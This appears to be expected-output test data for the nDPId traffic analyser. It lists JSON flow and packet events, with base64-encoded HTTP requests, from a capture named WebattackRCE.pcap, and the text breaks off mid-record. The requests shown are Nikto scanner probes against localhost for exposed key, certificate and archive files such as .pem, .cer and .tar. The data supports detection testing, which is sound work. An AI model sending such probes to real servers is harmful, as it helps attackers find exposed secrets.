-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
